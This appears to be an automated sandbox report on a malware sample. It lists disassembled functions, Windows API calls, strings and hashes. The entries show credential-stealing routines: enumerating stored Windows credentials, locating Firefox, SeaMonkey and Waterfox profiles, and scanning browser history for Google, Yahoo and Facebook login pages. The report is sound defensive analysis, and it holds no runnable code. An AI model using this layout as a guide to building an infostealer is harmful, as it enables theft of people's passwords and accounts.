                                                            control_flow_graph 965 40bdb0-40bdce call 404363 968 40bf63-40bf6f call 40440c 965->968 969 40bdd4-40bddd 965->969 970 40bdee 969->970 971 40bddf-40bdec CredEnumerateW 969->971 973 40bdf0-40bdf2 970->973 971->973 973->968 975 40bdf8-40be18 call 40b2cc wcslen 973->975 978 40bf5d-40bf60 LocalFree 975->978 979 40be1e-40be20 975->979 978->968 979->978 980 40be26-40be42 wcsncmp 979->980 981 40be48-40be77 call 40bd5d call 404423 980->981 982 40bf4e-40bf57 980->982 981->982 987 40be7d-40bea3 memset 981->987 982->978 982->979 988 40bea5 987->988 989 40bea7-40beea memcpy 987->989 988->989 990 40bf11-40bf2d wcschr 989->990 991 40beec-40bf06 call 40b2cc _wcsnicmp 989->991 993 40bf38-40bf48 LocalFree 990->993 994 40bf2f-40bf35 990->994 991->990 996 40bf08-40bf0e 991->996 993->982 994->993 996->990
                                                            APIs
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                            • wcslen.MSVCRT ref: 0040BE06
                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                            • memset.MSVCRT ref: 0040BE91
                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                            • wcschr.MSVCRT ref: 0040BF24
                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                            • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                            • String ID:
                                                            • API String ID: 1564206659-0
                                                            • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                            • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                            Control-flow Graph

                                                            control_flow_graph 998 40bb98-40bbcc call 44db70 call 40cbe1 call 40cc26 1005 40bbd2-40bbd8 call 40cf04 998->1005 1006 40bd4b-40bd5a call 40cc0c 998->1006 1010 40bbdd-40bbdf 1005->1010 1010->1006 1011 40bbe5-40bbf9 call 40b2cc call 40ccf0 1010->1011 1011->1006 1016 40bbff-40bc19 call 40cbe1 call 40a9b5 1011->1016 1021 40bc1b 1016->1021 1022 40bc1d-40bc30 call 40ccb4 call 40cf04 1016->1022 1021->1022 1027 40bd43-40bd46 call 40cc0c 1022->1027 1028 40bc36-40bc48 call 40b2cc call 40ccf0 1022->1028 1027->1006 1028->1027 1034 40bc4e-40bc5d call 40a9b5 1028->1034 1037 40bc61-40bce0 memset * 2 WideCharToMultiByte call 40103c call 40b273 memcmp 1034->1037 1038 40bc5f 1034->1038 1037->1027 1043 40bce2-40bd12 call 404423 1037->1043 1038->1037 1043->1027 1046 40bd14-40bd17 1043->1046 1046->1027 1047 40bd19-40bd1d 1046->1047 1048 40bd3a-40bd3d LocalFree 1047->1048 1049 40bd1f-40bd33 memcpy 1047->1049 1048->1027 1049->1048
                                                            APIs
                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                            • memset.MSVCRT ref: 0040BC75
                                                            • memset.MSVCRT ref: 0040BC8C
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                            • String ID:
                                                            • API String ID: 115830560-3916222277
                                                            • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                            • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                            • free.MSVCRT ref: 0041848B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$ErrorLastfree
                                                            • String ID: |A
                                                            • API String ID: 77810686-1717621600
                                                            • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                            • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                            APIs
                                                            • memset.MSVCRT ref: 0041249C
                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                            • wcscpy.MSVCRT ref: 004125A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                            • String ID: r!A
                                                            • API String ID: 2791114272-628097481
                                                            • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                            • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                            APIs
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                            • wcslen.MSVCRT ref: 0040C82C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                            • API String ID: 2936932814-4196376884
                                                            • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                            • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                            APIs
                                                            • memset.MSVCRT ref: 0040A824
                                                            • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                            • wcscpy.MSVCRT ref: 0040A854
                                                            • wcscat.MSVCRT ref: 0040A86A
                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                            • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID: C:\Windows\system32
                                                            • API String ID: 669240632-2896066436
                                                            • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                            • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                            APIs
                                                            • memset.MSVCRT ref: 00403CBF
                                                            • memset.MSVCRT ref: 00403CD4
                                                            • memset.MSVCRT ref: 00403CE9
                                                            • memset.MSVCRT ref: 00403CFE
                                                            • memset.MSVCRT ref: 00403D13
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 00403DDA
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                            • String ID: Waterfox$Waterfox\Profiles
                                                            • API String ID: 4039892925-11920434
                                                            • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                            • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                            APIs
                                                            • memset.MSVCRT ref: 00403E50
                                                            • memset.MSVCRT ref: 00403E65
                                                            • memset.MSVCRT ref: 00403E7A
                                                            • memset.MSVCRT ref: 00403E8F
                                                            • memset.MSVCRT ref: 00403EA4
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 00403F6B
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                            • API String ID: 4039892925-2068335096
                                                            • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                            • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                            APIs
                                                            • memset.MSVCRT ref: 00403FE1
                                                            • memset.MSVCRT ref: 00403FF6
                                                            • memset.MSVCRT ref: 0040400B
                                                            • memset.MSVCRT ref: 00404020
                                                            • memset.MSVCRT ref: 00404035
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 004040FC
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                            • API String ID: 4039892925-3369679110
                                                            • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                            • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                            APIs
                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                            • API String ID: 3510742995-2641926074
                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                            APIs
                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                            • memset.MSVCRT ref: 004033B7
                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                            • wcscmp.MSVCRT ref: 004033FC
                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                            • String ID: $0.@
                                                            • API String ID: 2758756878-1896041820
                                                            • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                            • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 2941347001-0
                                                            • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                            • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                            APIs
                                                            • memset.MSVCRT ref: 00403C09
                                                            • memset.MSVCRT ref: 00403C1E
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                            • wcscat.MSVCRT ref: 00403C47
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • wcscat.MSVCRT ref: 00403C70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                            • API String ID: 1534475566-1174173950
                                                            • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                            • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                            APIs
                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • memset.MSVCRT ref: 00414C87
                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                            • wcscpy.MSVCRT ref: 00414CFC
